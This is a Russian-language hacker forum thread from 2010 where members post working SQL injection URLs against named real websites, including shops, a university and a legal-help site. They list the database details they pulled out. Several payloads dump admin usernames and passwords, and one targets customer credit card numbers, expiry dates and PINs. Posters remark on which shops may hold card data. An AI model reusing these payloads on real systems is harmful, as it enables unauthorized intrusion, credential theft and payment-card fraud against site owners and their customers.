18.02.2010, 22:01
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
http://foxridge.web2.ttlc.net/detail.cfm?product=3699+OR+1=@@version+--+
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://foxridge.web2.ttlc.net/detail.cfm?product=3699+OR+1=(select+top+1+table_n ame+from+information_schema.tables+where+(table_na me)+not+in+(select+top+1+table_name+from+informati on_schema.tables))+--+
|
|
|
19.02.2010, 01:17
|
|
Участник форума
Регистрация: 25.10.2008
Сообщений: 215
С нами:
9233818
Репутация:
78
|
|
Код:
http://www.brew-monkey.com/news.php?id=757+union+select+1,2,version(),4,5+--+
Database: brew-monkey
User: bmdbuser
Version: 4.0.26-nt |
|
|
|
19.02.2010, 04:01
|
|
Новичок
Регистрация: 26.10.2009
Сообщений: 17
С нами:
8706185
Репутация:
27
|
|
Забугорный шоп, возможно наличие СС.
Код:
http://sales.capitalsoundandlight.com/product.php?id=-7+union+select+UNHEX(HEX(concat_WS(0x3a,Version(),Database(),user()))),2--
Version: 4.1.14
User: CSL
DataBase:csl@localhost 2
-===-
Тут уже всё раскручено.
Версия пятерка.
Код:
http://www.bigcheez.com.au/buy_print.php?id=1&item=32+and+1=0+union+select+1,2,unhex(hex(concat_ws(0x3a,username,password))),4,5,6,7,8,9+from+user--
-===-
Шоп свежий. СС пока что нету.
Версия: 4
Код:
https://www.xmission.com/~kensandersrarebooks/inventory_buy.php?id=16946+and+1=0+union+select+1,2,3,concat_ws(0x3a,bill_firstname,bill_lastname,bill_address,bill_city,bill_state,bill_zip,bill_country,cc_name,cc_number,cc_expiry,cc_pin),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+customers--
-===-
Version = 4.1.22-standard
Current User = academy_webmaste@localhost
Current Database = academy_efm
PR: 4
Код:
http://www.efmacademy.nl/index.php?id=4&subid=56+and+1=0+union+select+1,2,3,4,5,6,7+from+admin--
Последний раз редактировалось Mr.Br0wn; 19.02.2010 в 05:06..
|
|
|
|
19.02.2010, 05:02
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Это была пожалуй самая замедрёная моя инъекция... но интересны же те инъекции, проводя которын ты скуриваешь полпачки, а то и пачку сигарет...
Собственно на одном форуме человек чей ник Like A Boss (thnx ему) запостил скулю, а вернее просто линк и кавычку, т.к. провести её он, как я понял, не смог.
Nice to stumble across something like this every once in a while. Any teenager in the UK should know what Connexions is. And it's the Berkshire website which i've found a vulnerability for. It's SQL injection
И вот, собственно этот линк:
Код:
http://connexions.oberon.titaninternet.co.uk/pages.php?id=1048'
Ну я подумал, и решил, что надо глянуть. Ну как обычно начал подбирать кол-во столбцов... И снова редирект. Решил попробывать подобрать с помощью программы dumper. Подобрал. 14. Там же и принтабельную колонку нашло(11. Туда я сразу вписал version() ). Но нажав на mysql info я получил сообщение Unknown trouble. Ну тут я начал выдумывать всякие разные конструкции... Ничего не получалось... редирект. И тут я подумал, а что если везде поставить null. Поставил, убрал and 1=2, но и всё равно ничего не вышло. Поставил снова and 1=2, и решил менять по одному значия null'ов на 1,2,3...
Когда вместо первого null'a я подставил 1, я получил Error 404 Not found. Тут я расстроился, и решил бросить это дело, но тут я обратил внимание на урл. И что я вижу: http://connexions.oberon.titaninternet.co.uk/4.0.20-standard. Вот такая вот скуля)
version: 4.0.20-standard
user: connexionsberks@localhost
database: connexions-berkshire |
|
|
|
19.02.2010, 05:57
|
|
Новичок
Регистрация: 26.10.2009
Сообщений: 17
С нами:
8706185
Репутация:
27
|
|
PR: 4
Version: 5.0.77
Код:
http://www.helplinelaw.com/docs/nplog.php?id=CANV3+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password,email),8,9,10,11+from+admin--
Админка:
Код:
http://helplinelaw.com/adminonline/index.php
-===-
ТиЦ: 20
PR: 4
Код:
http://www.eco-tourism.kz/content.php?id=109+and+1=0+union+select+1,2,concat_ws(0x3a,username,password),4+from+tb_users--
-===-
PR: 4
user: anthony_iching@localhost
version: 5.0.67-community
database: anthony_anthony
Код:
http://www.ichingoracle.com/show_book.php?ID=23+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,0,1--
Последний раз редактировалось Mr.Br0wn; 19.02.2010 в 06:22..
|
|
|
|
19.02.2010, 10:45
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
http://univd.edu.ua/index.php?lan=ukr&id=-1+union+select+1,unhex%28hex%28concat_ws%280x3a,Lo gin,password,name,category_id,active,email,region, city,phone,id,name,count_open,old_date,url%29%29%2 9,3+from+users--
|
|
|
|
19.02.2010, 13:15
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
http://voznesenskaya.com/buy.php?id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),database(),version()),10+--+
voznesensk@localhost:voznesensk:5.0.26-log
|
|
|
|
19.02.2010, 15:55
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Код:
http://musakov.ru/inc/ind.php?page=3&exist=1&year=2008&id=-1+union+select+1,2,3,4,concat(database(),0x3a,user(),0x3a,version()),6,7
musakov:musakov@localhost:4.1.20-lk-log |
|
|
|
19.02.2010, 16:25
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Код:
http://board.titaeva.ru/ind.php?id_categ=-1+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+&tr=1
4.1.25-log:titaeva8_user1@localhost:titaeva8_base1
Код:
http://www.bazasuper.ru/dosk/ind.php?id_categ=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11,12,14,14,15,16,17,18,19,20,21,22,23+--+&tr=1
5.0.32-Debian_7etch8-log:u2478@localhost:u2478_bazasuper
Код:
http://www.kuchamala.info/ind.php?id_typ=-1+union+select+1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+&tr=1
5.0.51a-community:forexsta_alex@localhost:forexsta_doska
Код:
http://www.cqham.sumy.ua/board5/ind.php?id_categ=-1+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+&tr=1
5.1.33:cqham@localhost:cqham |
|
|
|
19.02.2010, 17:03
|
|
Новичок
Регистрация: 27.11.2008
Сообщений: 4
С нами:
9186855
Репутация:
3
|
|
http://global.usf.edu/educationabroad/progInfo.php?prog_id=-75+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33--
version 4
help us please
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1914469){kind=avatar}
Комбинированный вид
